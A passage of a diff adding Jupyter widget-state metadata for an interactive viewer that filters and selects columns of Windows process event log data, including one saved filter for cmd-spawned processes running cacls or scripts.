+       "layout": "IPY_MODEL_315902317a0547f9a8f19c4355197016",
+       "style": "IPY_MODEL_41e832972ce94fd6b272cbcd2e381a24"
+      }
+     },
+     "cd7d521ef00c486795f5682f8bdf3551": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ce18307d720f4137901b5fccd2827cff": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "cf5e4274010541d8865bc05ddf91e0d2": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "cf88b195506e465585b9abaf1f824f41": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "cf90564c84924e9387482f4b4871f57a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "d01ff6e76da64f6aad95f814b058487a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "200px"
+      }
+     },
+     "d0c335b6bcab46379fda2071644ecc0b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Update filter",
+       "layout": "IPY_MODEL_4720a484b76c4164b5d14b596ac913a8",
+       "style": "IPY_MODEL_ce18307d720f4137901b5fccd2827cff"
+      }
+     },
+     "d1566493e90544909fb12b330299ac05": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_f20ffb637290441385bba89c732ca17b",
+        "IPY_MODEL_84a9aec138164093a2e6067cd11155d1",
+        "IPY_MODEL_d6c002bd38f041f5a84bcdcdcb15ad7a",
+        "IPY_MODEL_601cfccce4314248aecf44c3d43382fc"
+       ],
+       "layout": "IPY_MODEL_eb96e104d86c4ca2a17d22cfccca00de"
+      }
+     },
+     "d1cfd4d8738a4ddd937998c2bb3bdfdb": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "d1f472f503b449cab2a6c41db52dd204": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "d2069c750fa040c4a1abb7b12b7d02a3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectMultipleModel",
+      "state": {
+       "_options_labels": [
+        "Account",
+        "CommandLine",
+        "Computer",
+        "EventID",
+        "NewProcessId",
+        "NewProcessName",
+        "ParentProcessName",
+        "ProcessId",
+        "SourceComputerId",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "SubjectUserName",
+        "SubjectUserSid",
+        "TargetLogonId",
+        "TenantId",
+        "TimeCreatedUtc",
+        "TimeGenerated",
+        "TokenElevationType"
+       ],
+       "description": "Source: ",
+       "index": [],
+       "layout": "IPY_MODEL_053405d2adb34f11a7a8e696006a0ba9",
+       "rows": 5,
+       "style": "IPY_MODEL_14bdab08f5eb4ebf8d9ea4402abda2c2"
+      }
+     },
+     "d27747a718124893b894e03d17551e8e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "d441f974166b4f72a2bafa678cbbded4": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "d4533ae3647e4d098cc51eb6a2127db3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "d4b71e3529c4456c853185a7be9f5ac8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "d623624498624e0c811372505b9ea306": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "d6aa34a7358d41baa5b43fd1af3699dd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "d6c002bd38f041f5a84bcdcdcb15ad7a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "⇽ Remove",
+       "layout": "IPY_MODEL_a7dcffbaa4414c7fa5e011de31701511",
+       "style": "IPY_MODEL_d1f472f503b449cab2a6c41db52dd204"
+      }
+     },
+     "d738b25d84fd4c3199fe462da739f0d9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add ⇾",
+       "layout": "IPY_MODEL_16f06a96b3b84861bc8fcdc521a9a9fc",
+       "style": "IPY_MODEL_077317f3b9dc4febacc1ec8a17237f44"
+      }
+     },
+     "d738de016f5241e085832e853683bca7": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "d769aff3aca54cf0b7e3fe900f6b59cf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "d7786047e2dc4f309f2385f17fe32dc5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Filter:",
+       "layout": "IPY_MODEL_4e297c36b90b4b4fa999fea2f992b72c",
+       "style": "IPY_MODEL_d4b71e3529c4456c853185a7be9f5ac8"
+      }
+     },
+     "d81645b362234e3f9128e78f10c600f8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add All ⇾",
+       "layout": "IPY_MODEL_cf90564c84924e9387482f4b4871f57a",
+       "style": "IPY_MODEL_89cc2910803348458afee283b5741518"
+      }
+     },
+     "d840b505fd474fc587b39b8624adf0bf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Clear all filters",
+       "layout": "IPY_MODEL_01b4914177cb4ea588ff91eb73cb18d2",
+       "style": "IPY_MODEL_c30b9753c9314d6e8601359f80c27b5a"
+      }
+     },
+     "d8963740d2844d74922276773cd3a13d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_a9093fa6558d4ded9d1dbd81d012564d",
+        "IPY_MODEL_dc4b373ad9954cda8d2ac0eba4fdf760",
+        "IPY_MODEL_ece0dbb660834aa7bc4d2787ee0c4290",
+        "IPY_MODEL_7ccb5b87754d479eb5e582d0342cc09c"
+       ],
+       "layout": "IPY_MODEL_1d25bec5fe57403d9fc4f20d2ff333d3"
+      }
+     },
+     "da88bfbd6a1041e18d934e1b94c84e28": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextareaModel",
+      "state": {
+       "description": "Filter value",
+       "layout": "IPY_MODEL_0f6cd28d4dc44a54be10c3bb6488a283",
+       "style": "IPY_MODEL_4240f695acbc496489d98ddef8c4b4fa"
+      }
+     },
+     "dacfd3a9a0b34000bae4e67a85ca250a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "500px"
+      }
+     },
+     "dafe89f0ccf54e93a4e27e79cdbbb91d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_ef8be17e9bd245e49ae066a4377673d0",
+       "style": "IPY_MODEL_6df397a9bfef4fff85d638ea7ed64ba3",
+       "value": "Enter multiple values separated by commas. Strings do not need quotes."
+      }
+     },
+     "dbb9c0a587ba49d0966f793675444e26": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "dbe784888e5b4e259a64cf12deee896d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "dc28fe9e73b04921911a2c679421e2e8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "95%"
+      }
+     },
+     "dc4b373ad9954cda8d2ac0eba4fdf760": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_91c4521dd87b4611b0327231aeb56283",
+        "IPY_MODEL_ddd19ce080fc44b2946ffee3ed4d3a49"
+       ],
+       "layout": "IPY_MODEL_9578b90f719547f0b4c11b238202c9cc"
+      }
+     },
+     "dcc07290f17244e1b2f7167f2ec5b403": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ddd19ce080fc44b2946ffee3ed4d3a49": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Update filter",
+       "layout": "IPY_MODEL_169037276db6452cb2ef539bbfcd13cd",
+       "style": "IPY_MODEL_ee4587f386544f71ad27714a37ebf8b8"
+      }
+     },
+     "de5a721dfab24746bca9695edc80f9af": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add ⇾",
+       "layout": "IPY_MODEL_3599f0195f74406a9eefc7ea701c5a53",
+       "style": "IPY_MODEL_ca39f6e939634ea1b8ef11bf0bcba99c"
+      }
+     },
+     "de824995993542838482144ef955b6ab": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "de89b5b8886a4db3837487d3aa14dd24": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "de973b84536943298f7fe5800bc3a62c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_de824995993542838482144ef955b6ab",
+       "style": "IPY_MODEL_fa4f5144c5b54f0dbc0d982d7747fadc",
+       "value": "Current filters"
+      }
+     },
+     "ded1344fbb1d46aba120fa799197296e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "CheckboxModel",
+      "state": {
+       "description": "not",
+       "disabled": false,
+       "layout": "IPY_MODEL_24f0b291afc94f2d9c1d7ad7e99aa4f0",
+       "style": "IPY_MODEL_0354b7441ac24daaaaed54717c3d29ca",
+       "value": false
+      }
+     },
+     "df18f2d18ec343158193cebc8f77b2ca": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "dfccb5d4237446459cc509270d55ba35": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "dff0190e115d4b2785e7a5fd7b074d8d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "e065ea541e08420c837b946865eb02cd": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "e13ff8b78c1a4f1a86cf3efd44926cce": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_c29e51193319449d81fadcf89b5bbfce",
+        "IPY_MODEL_09f33472219641b89332f93f49ed773f"
+       ],
+       "layout": "IPY_MODEL_2e7cce877ce84b2d952c845e924acf80"
+      }
+     },
+     "e2328c04c2de42f989a5029717800568": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "==",
+        "contains",
+        "matches",
+        "in",
+        "between",
+        "query"
+       ],
+       "index": 0,
+       "layout": "IPY_MODEL_160638c038d04834a03e8cc1e8e788a4",
+       "style": "IPY_MODEL_2b69ea13a55049a98b892d9cb690ba48"
+      }
+     },
+     "e4ee07ff3b964c7d8f29b74b985769dc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Apply filter",
+       "layout": "IPY_MODEL_5c4e8097bca54b779cee09f7e6ad4084",
+       "style": "IPY_MODEL_e5d1070cebe44fdea5a47642582859cb"
+      }
+     },
+     "e51b0aa5262c45bc9f1f3a6e3313d219": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "e5d1070cebe44fdea5a47642582859cb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "e60df3b80f6746369ec6051d19a3a3b6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_4b5cb16646744994a0591fd8c712a95c",
+        "IPY_MODEL_10d96dd974f54d1a8e5a94cb9c03872e",
+        "IPY_MODEL_77e028053b3f49799406ea9d7cb56953"
+       ],
+       "layout": "IPY_MODEL_f27451d097b5468caf4f8770d68b139e"
+      }
+     },
+     "e62e7f1a080640fd90e2fb1471583396": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "e66cc5687c9b491c82606ce504ad107c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "40%"
+      }
+     },
+     "e6887207495342f687d796cfcfcf1cb5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "e6db1929109d48c19ca8b42095c4496d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "e6e59154a9384db382274533a2321481": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_51133fd46f5b40a9b4846a7375020529",
+        "IPY_MODEL_befe835037dc4d2c91e679f463aac44a"
+       ],
+       "layout": "IPY_MODEL_5ea3e5fb5bfe4f5fb9004a659d5dc3bb"
+      }
+     },
+     "e764c684b29b4baeae8f3d7e4070d57c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "e847652e2c8a45cab0ad278a6c880a08": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "e8c3b59a99834acebaed0b8358616349": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "TenantId",
+        "Account",
+        "EventID",
+        "TimeGenerated",
+        "Computer",
+        "SubjectUserSid",
+        "SubjectUserName",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "NewProcessId",
+        "NewProcessName",
+        "TokenElevationType",
+        "ProcessId",
+        "CommandLine",
+        "ParentProcessName",
+        "TargetLogonId",
+        "SourceComputerId",
+        "TimeCreatedUtc"
+       ],
+       "index": 14,
+       "layout": "IPY_MODEL_d01ff6e76da64f6aad95f814b058487a",
+       "style": "IPY_MODEL_88ac2326de314e9fb81828f0a49ab21e"
+      }
+     },
+     "e8fa63f35d3f43c6b516ef58e8535d31": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Apply columns",
+       "layout": "IPY_MODEL_a453fb04433d445c8a906b6b5b86093f",
+       "style": "IPY_MODEL_3fac7055e539457aae88db9d1b336a88"
+      }
+     },
+     "e95cc7a9a24948128c59f64d45e25e35": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_1d0daf94ee134e1b903ad364e730b934",
+        "IPY_MODEL_99e3ed316f0c4801bbebdbcd7e5e9eea"
+       ],
+       "layout": "IPY_MODEL_af4f3a82204b425eaff3b8ae8f022c5c"
+      }
+     },
+     "e98ae86d25c84795a7adb7946fde3294": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "e9a364d8356242eaa460bfc61f58ce75": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "⇽ Remove",
+       "layout": "IPY_MODEL_bcb693da74b04b08b12702d7192a1797",
+       "style": "IPY_MODEL_7634458fadea4febba04fb37f6a2b441"
+      }
+     },
+     "ea45bf84dd3646578c9f60b4113bea79": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Choose columns",
+        "1": "Filter data"
+       },
+       "children": [
+        "IPY_MODEL_a2042295c9d24d27acfc9fe059cdeaa2",
+        "IPY_MODEL_fc148fd97a9647f5bea276ad71322829"
+       ],
+       "layout": "IPY_MODEL_1032768376944459aa3e6c70a39123b6",
+       "selected_index": 1
+      }
+     },
+     "eacebb41fb384c078fce1b8c377d0561": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_73ace9de6deb47e08240f8355a93cbf0",
+        "IPY_MODEL_d1566493e90544909fb12b330299ac05",
+        "IPY_MODEL_853b539b4a84472694072df83fc030af"
+       ],
+       "layout": "IPY_MODEL_1ed4e7117a7a46439348eef4ba7f228b"
+      }
+     },
+     "eb3dc04670bd49e5a34fadf671232fb0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "eb96e104d86c4ca2a17d22cfccca00de": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ec1d999779764d73bc094bd79d94caf2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_b3910b3aa2ef40fba7b43d0cb4ab9d13",
+       "style": "IPY_MODEL_2b8f523976c5435097fc758367a29155",
+       "value": "Current filters"
+      }
+     },
+     "ec1f0973c9734ab4880c96cfd2aeabb3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ec5e3915e70c4a9dab9c9d602736c51c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "ecc9cf108d494c27b2e982c04e75b1e6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_d2069c750fa040c4a1abb7b12b7d02a3",
+        "IPY_MODEL_29c61bd1b3764cac8949a397cc11ca0c",
+        "IPY_MODEL_f307dc0314e64566b09853d75cec8b01"
+       ],
+       "layout": "IPY_MODEL_822a4e905a5c44f8897cac7be18a6a66"
+      }
+     },
+     "ece0dbb660834aa7bc4d2787ee0c4290": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_95c7078cbbc14e81800c9beaca07ab61",
+        "IPY_MODEL_9d1e3519a8aa40f8afc5253b143f1cfc"
+       ],
+       "layout": "IPY_MODEL_700662f2d6474ed083f4288403c33847"
+      }
+     },
+     "edc7b60605b14803a11f32010de9f9dd": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ede5f65334bb4b3f8c03c55d590663ee": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ee4587f386544f71ad27714a37ebf8b8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "ef0ff907f7944bf0995004e685b6309e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ef8be17e9bd245e49ae066a4377673d0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "efb5f03aa620490a90d8ff5f537efb4c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "f06eec399f3c4636bd958d097dec7c31": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "TenantId",
+        "Account",
+        "EventID",
+        "TimeGenerated",
+        "Computer",
+        "SubjectUserSid",
+        "SubjectUserName",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "NewProcessId",
+        "NewProcessName",
+        "TokenElevationType",
+        "ProcessId",
+        "CommandLine",
+        "ParentProcessName",
+        "TargetLogonId",
+        "SourceComputerId",
+        "TimeCreatedUtc"
+       ],
+       "index": 0,
+       "layout": "IPY_MODEL_263cb71d2dab4c549c1f7cfd0e1ab996",
+       "style": "IPY_MODEL_a4db3fb217db4ee099ade4ec11dc5f91"
+      }
+     },
+     "f160ac28c4df4a638a9e14a72187d4cf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete filter",
+       "layout": "IPY_MODEL_ec1f0973c9734ab4880c96cfd2aeabb3",
+       "style": "IPY_MODEL_57fc931f1f6745b5b44d7360f6ee88f7"
+      }
+     },
+     "f20ffb637290441385bba89c732ca17b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add All ⇾",
+       "layout": "IPY_MODEL_d1cfd4d8738a4ddd937998c2bb3bdfdb",
+       "style": "IPY_MODEL_4adbd494324149ee87c67f74fb08c17a"
+      }
+     },
+     "f27451d097b5468caf4f8770d68b139e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "f307dc0314e64566b09853d75cec8b01": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectMultipleModel",
+      "state": {
+       "_options_labels": [
+        "Account",
+        "CommandLine",
+        "Computer",
+        "EventID",
+        "NewProcessName",
+        "ParentProcessName",
+        "TimeGenerated"
+       ],
+       "description": "Selected: ",
+       "index": [],
+       "layout": "IPY_MODEL_053405d2adb34f11a7a8e696006a0ba9",
+       "rows": 5,
+       "style": "IPY_MODEL_676fdbb9a65043568fd3c819d1cf7a3d"
+      }
+     },
+     "f410bb9feac74bff8c2576f2affec5bd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "==",
+        "contains",
+        "matches",
+        "in",
+        "between",
+        "query"
+       ],
+       "index": 0,
+       "layout": "IPY_MODEL_d27747a718124893b894e03d17551e8e",
+       "style": "IPY_MODEL_ae90356d18304d3db37a05ffb571255c"
+      }
+     },
+     "f42540ef834c46588330bc919ebe7a37": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "⇽ Remove All",
+       "layout": "IPY_MODEL_6194e41b56e9470090e9ade5fb082686",
+       "style": "IPY_MODEL_ba9e467fd43a4f8a9fd1945b5b733982"
+      }
+     },
+     "f4275863d3aa4f599341acb67bb42d79": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add All ⇾",
+       "layout": "IPY_MODEL_24cd9a81835f496aa7097b6502a8818c",
+       "style": "IPY_MODEL_3421dbe76372482c9fbad5f3bba4582a"
+      }
+     },
+     "f49a1b720a034428aeaf34e514aea0a8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "80%"
+      }
+     },
+     "f4f60fc719914eacb9755d5f34d6e6e8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "40%"
+      }
+     },
+     "f54de8691386447697961c9c868f9a29": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "40%"
+      }
+     },
+     "f5f1db4d825c4c669f6c4b75ceaa636d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "f859b4a334e14303ab3708553ba044e4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "f88331d7df0c45e4b15afc2261ba564e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "f89dd23f69274462bbc7cf9024d352e6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "EventID query 'ParentProcessName.str.contains('cmd') and (CommandLine.str.contains('cacls') or CommandLine.str.contains('script'))'"
+       ],
+       "description": "Filters",
+       "index": 0,
+       "layout": "IPY_MODEL_85b9e3ef6fbe424aa297286fc8ff7b4d",
+       "style": "IPY_MODEL_4290b96dad854b4e8ef4d3ef551ebd05"
+      }
+     },
+     "f9bb93dfd701429682c1c6bb625f5063": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ec1d999779764d73bc094bd79d94caf2",
+        "IPY_MODEL_650a6653093a4b51b357c79f7b3d5ba5"
+       ],
+       "layout": "IPY_MODEL_c8c388f3d0b84b93925baaef4499d14e"
+      }
+     },
+     "fa0d00879f4545729b6398deb167094d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Apply filter",
+       "layout": "IPY_MODEL_49926b14baa846ed9ec26bffa8f01557",
+       "style": "IPY_MODEL_58e88d32feee440798b623eab2c6e1ca"
+      }
+     },
+     "fa4f5144c5b54f0dbc0d982d7747fadc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "fc148fd97a9647f5bea276ad71322829": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_9dff4a1c556a4a0483e3f1be59d6abd1",
+        "IPY_MODEL_e95cc7a9a24948128c59f64d45e25e35",
+        "IPY_MODEL_f9bb93dfd701429682c1c6bb625f5063",
+        "IPY_MODEL_fa0d00879f4545729b6398deb167094d"
+       ],
+       "layout": "IPY_MODEL_0e6ce2977dbb4f9399699b3d650b23fb"
+      }
+     },
+     "fc24f008595e4a16830989b86d128b23": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add filter",
